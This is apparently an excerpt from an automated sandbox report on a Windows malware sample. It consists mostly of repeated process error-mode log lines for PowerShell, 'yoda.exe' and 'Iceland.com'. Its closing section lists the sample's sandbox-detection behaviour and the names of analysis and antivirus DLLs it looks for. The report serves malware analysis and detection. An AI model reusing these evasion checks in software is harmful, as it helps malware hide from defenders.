Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_21-104133

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Iceland.com, 00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
Source: Iceland.com, 00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.

